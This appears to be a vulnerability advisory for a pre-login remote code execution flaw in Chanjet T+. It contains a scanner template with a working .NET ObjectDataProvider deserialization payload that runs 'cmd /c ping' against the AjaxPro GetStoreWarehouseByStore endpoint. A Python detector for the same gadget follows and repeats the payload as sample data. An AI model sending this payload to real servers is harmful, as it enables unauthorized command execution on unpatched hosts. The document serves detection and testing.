Vulnerability description
Yonyou Chanjet T+ (Tplus) has an unauthenticated (pre-login) remote code execution vulnerability. The GetStoreWarehouseByStore method is exposed through the AjaxPro handler, which deserializes client-supplied JSON and honours `__type` type hints; an attacker can supply a serialized ObjectDataProvider gadget in the storeID parameter and have the server start an arbitrary process. The result is disclosure of sensitive server data or full code execution on the host.
app="畅捷通-TPlus"
id: chanjet-tplus-rce

info:
  name: Chanjet T+ Remote Command Execution
  author: zan8in
  severity: critical
  verified: true
  description: |
    Yonyou Chanjet T+ has an unauthenticated (pre-login) remote code execution vulnerability: an attacker can inject a serialized payload through the GetStoreWarehouseByStore method and execute arbitrary commands, leading to disclosure of sensitive server data or code execution.
    app="畅捷通-TPlus"
  solutions: |
    Chanjet Tplus 13.0
    Chanjet Tplus 16.0
  reference:
    - https://mp.weixin.qq.com/s/RjzeOi4JLUL_djBOoQ2sJA
  tags: chanjet,tplus,rce
  created: 2023/07/08

# Out-of-band check: the payload makes the target resolve a collaborator hostname,
# so execution is proven by a DNS lookup rather than by reading command output.
set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: POST
      path: /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore
      headers:
        X-Ajaxpro-Method: GetStoreWarehouseByStore
      # AjaxPro resolves the "__type" hints below into real .NET types while
      # deserializing storeID. ObjectDataProvider then invokes Process.Start on the
      # supplied ProcessStartInfo, i.e. the classic ObjectDataProvider gadget.
      body: |
        {
          "storeID":{
            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName":"Start",
            "ObjectInstance":{
              "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c ping {{oobDNS}}"
              }
            }
          }
        }
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()
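The template above proves the bug from the attacker's side. The following is an added example, not part of the original template or of afrog, showing the detection logic a defender would run over captured HTTP requests to the T+ AjaxPro handler: it walks every `__type` hint in the request body, at any nesting depth, and alerts when one of them names the ObjectDataProvider / Process / ProcessStartInfo gadget types that the PoC relies on. The request records and the hostname `oob.example.invalid` are constructed sample data; the record layout (`method`, `path`, `headers`, `body`) is an assumption of this example, not a format T+ or AjaxPro produces.

```python
"""Detect AjaxPro type-hint deserialization gadgets (ObjectDataProvider chain).

Added example for the Chanjet T+ GetStoreWarehouseByStore PoC; the sample
requests below are constructed and the record layout is this example's own.
"""
import json
import re
from typing import Iterator

# Type names that never belong in a __type hint of a legitimate AjaxPro call.
# Matched as prefixes so the assembly/version suffix does not matter.
DANGEROUS_TYPES = (
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",          # also covers ProcessStartInfo
)

# Any AjaxPro handler, e.g. /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx
AJAXPRO_PATH = re.compile(r"/ajaxpro/.+\.ashx", re.IGNORECASE)


def iter_type_hints(node) -> Iterator[str]:
    """Yield the value of every '__type' key in parsed JSON, at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "__type" and isinstance(value, str):
                yield value
            else:
                yield from iter_type_hints(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_type_hints(item)


def find_gadget_types(body: str) -> list[str]:
    """Return the dangerous type hints found in a request body.

    If the body is not valid JSON, fall back to a regex over the raw text so a
    deliberately sloppy payload that the .NET side still tolerates is not missed.
    """
    try:
        hints = list(iter_type_hints(json.loads(body)))
    except ValueError:
        hints = re.findall(r'"__type"\s*:\s*"([^"]+)"', body)
    return [h for h in hints if h.strip().startswith(DANGEROUS_TYPES)]


def classify_request(req: dict) -> dict:
    """Score one request record with keys method, path, headers, body."""
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    is_ajaxpro = bool(AJAXPRO_PATH.search(req.get("path", ""))) or "x-ajaxpro-method" in headers
    gadgets = find_gadget_types(req.get("body", "")) if req.get("method") == "POST" else []
    return {"ajaxpro_call": is_ajaxpro, "gadget_types": gadgets, "alert": is_ajaxpro and bool(gadgets)}


# Constructed sample traffic: the PoC body, a benign call to the same method,
# and an unrelated request.
POC_BODY = (
    '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, '
    'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start",'
    '"ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, '
    'Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":'
    '"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, '
    'PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c ping oob.example.invalid"}}}}'
)
HANDLER = "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore"
SAMPLE_REQUESTS = [
    {"method": "POST", "path": HANDLER, "headers": {"X-Ajaxpro-Method": "GetStoreWarehouseByStore"}, "body": POC_BODY},
    {"method": "POST", "path": HANDLER, "headers": {"X-Ajaxpro-Method": "GetStoreWarehouseByStore"}, "body": '{"storeID":1}'},
    {"method": "GET", "path": "/tplus/login.aspx", "headers": {}, "body": ""},
]


def scan(requests: list[dict]) -> list[int]:
    """Return the indexes of the requests that should raise an alert."""
    return [i for i, req in enumerate(requests) if classify_request(req)["alert"]]


if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, classify_request(req))
```

The walk over `__type` matters more than the exact handler path: the gadget can be nested under any parameter name, and the same chain works against any AjaxPro method that deserializes a complex argument, so the rule keys on the type hints and treats the path and `X-Ajaxpro-Method` header only as context.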